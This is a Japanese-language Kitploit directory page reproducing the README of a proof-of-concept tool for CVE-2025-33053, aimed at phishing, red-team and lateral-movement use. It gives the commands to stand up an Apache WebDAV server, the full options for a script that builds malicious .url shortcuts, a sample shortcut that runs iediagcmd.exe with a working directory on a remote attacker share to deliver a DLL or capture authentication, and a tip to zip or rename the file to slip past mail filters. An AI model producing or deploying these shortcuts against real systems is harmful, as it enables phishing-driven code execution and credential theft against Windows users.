Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/devbuihieu/cve-2025-33053-proof-of-concept
ペイロード生成エクスプロイト横移動フィッシングウェブセキュリティペネトレーションテストコマンド&コントロールソーシャルエンジニアリングレッドチーミング

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHubdevbuihieu/cve-2025-33053-proof-of-concept

CVE-2025-33053-Proof-Of-Concept

CVE-2025-33053 概念実証(PoC)

リポジトリを見る
64161年前Kitploit レビュー済み

CVE-2025-33053 概念実証

このリポジトリは、Apache2 を使用して Ubuntu 上に WebDAV サーバーを自動的に展開し、フィッシング、レッドチーム演習、または横展開シミュレーションで使用するための悪意のある .url ショートカットファイルを生成するスクリプトを提供します。


📁 内容

  • setup_webdav.sh – Apache2 + WebDAV を設定する Bash スクリプト。
  • setup_webdav.py – 上記の Python 版。
  • gen_url.py – UNC/WebDAV パスを含む .url ショートカットファイルを生成する Python スクリプト。
  • README.md – ドキュメント。

🔧 必要条件

  • OS: Ubuntu 20.04 以降(Debian 互換)
  • root 権限(sudo)
  • Python 3.x

🚀 セットアップ手順

1. WebDAV サーバー(Bash 経由)

root@kitploit:~
sudo bash setup_webdav.sh

または Python を使用する場合:

root@kitploit:~
sudo python3 setup_webdav.py

デフォルトでは、スクリプトは次のことを行います:

  • Apache と必要な WebDAV モジュールをインストールします。
  • /var/www/webdav に共有ディレクトリを作成します。
  • DAV および DAV_FS モジュールを有効にします。
  • DavLockDB ディレクトリを作成します(Apache DAV のロックエラーを防ぐため)。
  • Apache サービスを再起動します。

📎 WebDAV パス: http://<your-ip>/webdav/


💣 悪意のある .url ショートカットの生成

使用例:

root@kitploit:~
python3 gen_url.py --ip 192.168.1.100 --out doc.url

すべてのオプション:

root@kitploit:~
python3 gen_url.py \
  --ip 《YOUR IP ADDRESS》\
  --share 《YOUR SHARE NAME》(Default: webdav) \
  --out 《YOUR OUTPUT FILENAME.url》(Default: bait.url) \
  --exe "C:\Program Files\Internet Explorer\iediagcmd.exe" \
  --icon "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" \
  --index 13 \
  --modified 20F06BA06D07BD014D

これにより、次のような .url ファイルが作成されます:

root@kitploit:~
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\192.168.1.100\webdav\
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D

📌 このファイルをクリックすると(特定の構成では)、ターゲットシステムが自動的にあなたの WebDAV サーバーに接続する可能性があります(認証または DLL の配信)。


🔒 セキュリティテストに関する注意事項

  • ローカルネットワークでテストする場合は、**ファイアウォールを無効化(またはポート 80 を開放)**してください:
    root@kitploit:~
    sudo ufw allow 80
    
  • .url ファイルは、以下の条件によって期待どおりに実行されない場合があります:
    • グループポリシーの制限
    • アプリケーションの既定値
    • メールクライアント(Gmail はそれらをサニタイズする可能性があります)
  • フィルターを回避するには、.url を zip 化するか、.txt にリネームする必要がある場合があります。

⚠️ 法的免責事項

このリポジトリは、教育目的および許可を得たペネトレーションテストのみを対象としています。
所有していない、またはテスト許可を得ていないシステムに対して、これらのスクリプトを使用しないでください。


🧠 参考情報

  • WebDAV サーバーのセットアップ - LinuxConfig.org
  • WebDAV Apache 設定 - Peter Girnus
  • Microsoft WebDAV ドキュメント

📬 連絡先

質問や倫理的なレッドチーム演習の依頼については、GitHub Issues までご連絡ください。

ツールをダウンロード